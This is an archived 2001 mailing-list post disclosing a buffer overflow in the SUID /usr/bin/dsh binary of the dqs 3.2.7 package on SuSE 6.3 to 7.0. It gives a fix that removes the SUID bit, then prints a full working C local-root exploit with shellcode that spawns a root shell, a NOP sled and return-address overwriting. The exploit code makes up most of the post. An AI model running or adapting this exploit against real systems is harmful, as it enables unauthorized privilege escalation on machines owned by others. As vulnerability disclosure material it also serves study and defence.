OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: dex dex (dexgodsofthome.net)
Date: Fri May 18 2001 - 19:09:11 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]


    Subject: dqs 3.2.7 local root exploit.

    Hello.

    DESCRIPTION:
    I found a buffer overflow vunerability on the
    /usr/bin/dsh (dqs 3.2.7
    package).

    I really don't know if this bug was discovered
    already. if thats right,
    then sorry =).

    If a long line on the first argument is gived, the
    program gives a SIGSEGV
    signal.

    This bug was reported to Drake Diedrich, Mantainer
    for dqs
    (Drake.Diedrichanu.edu.adu).

    AFFECTED:
    SusE 6.3, 6.4, 7.0 have the dqs 3.2.7 by default
    an then it are vunerable,
    maybe others.

    FIX:
    Remove the SUID permission
    |rootnetdex /root|# ls -la /usr/bin/dsh
    -rwsr-xr-x 1 root root 502748 May 18
    00:36 /usr/bin/dsh
    |rootnetdex /root|# chmod -s /usr/bin/dsh
    |rootnetdex /root|# ls -la /usr/bin/dsh
    -rwxr-xr-x 1 root root 502748 May 18
    00:36 /usr/bin/dsh
    |rootnetdex /root|#

    EXAMPLE EXPLOIT:
    You can found the exploit at
    www.raza-mexicana.org/programas/programas/qsexp.c
    And here it is:

    ----CUT HERE----

    /* - dqsexp.c - */
    /********************************************************************/
    /* /usr/bin/dsh(dqs 3.2.7 package) local root
    exploit. */
    /* SuSE 6.3, 6.4, and 7.0 are
    vunerable. */
    /* dexraza-mexicana.org <>
    http://www.raza-mexicana.org */
    /* Saludos: dr_fdisk^, yield, vlad, deadsector,
    trovalz, fatal, */
    /* megaflop y a todo raza. que weba escribirlos
    todos XD. */
    /* En especial saludos al espa~olete(NOP) :P, ya
    sabes porque. */
    /*
    */
    /* - dexraza-mexicana.org <>
    http://www.raza-mexicana.org - */
    /********************************************************************/

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    #define BUFFSIZE 2772
    #define OFFSET 0
    #define ALIGN 0

    unsigned long get_sp(void) {
    __asm__("movl %esp, %eax");
    }

    static char code[]= /* stolen
    from mount.c :P */

      "\x29\xc0" /* subl
    %eax, %eax */
      "\xb0\x46" /* movb
    $70, %al */
      "\x29\xdb" /* subl
    %ebx, %ebx */
      "\xb3\x0c" /* movb
    $12, %bl */
      "\x80\xeb\x0c" /* subb
    $12, %bl */
      "\x89\xd9" /* movl
    %ebx, %ecx */
      "\xcd\x80" /* int
    $0x80 */
      "\xeb\x18" /* jmp
    callz */
      "\x5e" /* popl
    %esi */
      "\x29\xc0" /* subl
    %eax, %eax */
      "\x88\x46\x07" /* movb
    %al, 0x07(%esi) */
      "\x89\x46\x0c" /* movl
    %eax, 0x0c(%esi) */
      "\x89\x76\x08" /* movl
    %esi, 0x08(%esi) */
      "\xb0\x0b" /* movb
    $0x0b, %al */
      "\x87\xf3" /* xchgl
    %esi, %ebx */
      "\x8d\x4b\x08" /* leal
    0x08(%ebx), %ecx */
      "\x8d\x53\x0c" /* leal
    0x0c(%ebx), %edx */
      "\xcd\x80" /* int
    $0x80 */
      "\xe8\xe3\xff\xff\xff" /* call
    start */
      "\x2f\x62\x69\x6e\x2f\x73\x68";


    void main(int argc, char **argv) {

    int i;
    unsigned long addr;

    char *buffer;

    int offset=OFFSET;
    int buffsize=BUFFSIZE;
    int align=ALIGN;

    if (argc > 1 ) offset = atoi(argv[1]);
    if (argc > 2 ) align = atoi(argv[2]);
    if (argc > 3 ) buffsize = atoi(argv[3]);

    buffer = (char *)malloc(buffsize + 8);

    addr = get_sp() - offset;
     
    for(i = 0; i < buffsize; i += 4) {
       *(long *)&buffer[i] = 0x90909090;
     }
     
     *(long *)&buffer[buffsize - 8] = addr;
     *(long *)&buffer[buffsize - 4] = addr;
     
     memcpy(buffer + buffsize - 8 - strlen(code) -
    align, code, strlen(code));
     

    printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n");
     printf("[*] /usr/bin/dsh(dqs 3.2.7 package) local
    root exploit.\n");
     printf("[*] - dexraza-mexicana.org <>
    http://www.raza-mexicana.org -
    \n");

    printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
     
     printf("[*] Address=0x%x, Align=%d, Offset=%d\n",
    addr, align, offset);

    printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
     printf("[*] Starting....\n");
     
     execl("/usr/bin/dsh", "dsh", buffer,
    "/etc/motd", NULL);
    }

    ----EOF----

    =================================================
    Mail: dexraza-mexicana.org
    Page: http://www.raza-mexicana.org
    ===============================================